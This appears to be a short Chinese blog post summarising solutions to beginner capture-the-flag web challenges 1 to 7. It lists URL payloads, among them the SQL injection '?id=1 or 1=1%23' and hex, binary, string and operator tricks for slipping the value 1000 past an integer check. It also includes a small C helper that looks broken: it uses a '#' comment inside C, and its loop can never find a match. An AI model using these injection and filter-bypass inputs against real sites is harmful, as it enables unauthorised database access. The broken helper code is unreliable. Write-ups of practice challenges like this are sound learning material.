萌新计划 web1-7总结

  1. web1
    直接 ?id=1 or 1=1%23
  2. web2
    直接 ?id=0x3e8 (16进制)
  3. web3
    直接 ?id='1000' (可以直接使用字符串绕过intval函数,而且数据库也可以查询)
  4. web4
    方法和web3一样
  5. web5
    直接使用~运算符
    ?id=~~1000
  6. web6
    方法和web5一样
  7. web7
    直接使用二进制:
    ?id=0b1111101000
    转换工具
    总结
  8. 使用运算符+,-,,/
    250
    4
    1200-200
    998+2(+转换成url编码%2b)
    --1000
  9. 我们可以使用位运算符来进行操作
    ^,<<,>>,|,~等等
#include<stdio.h>
//by Firebasky
int main()
{
int i,j;
for(i=0;i<1000;i++)
{
	for(j=0;j<1000;j++)
	{
		if((i>>j)==1000)#直接修改位运算符
		{
			printf("%d,%d\n",i,j);
			break;
		}
	}
}
return 0;
}
  1. 使用进制转换
    2进制开头0b
    8进制开头0
    16进制开头0x
    转换工具
  2. 使用字符串绕过
    单引号,双引号,括号等等
posted @ 2020-08-08 19:27  Firebasky  阅读(231)  评论(0)    收藏  举报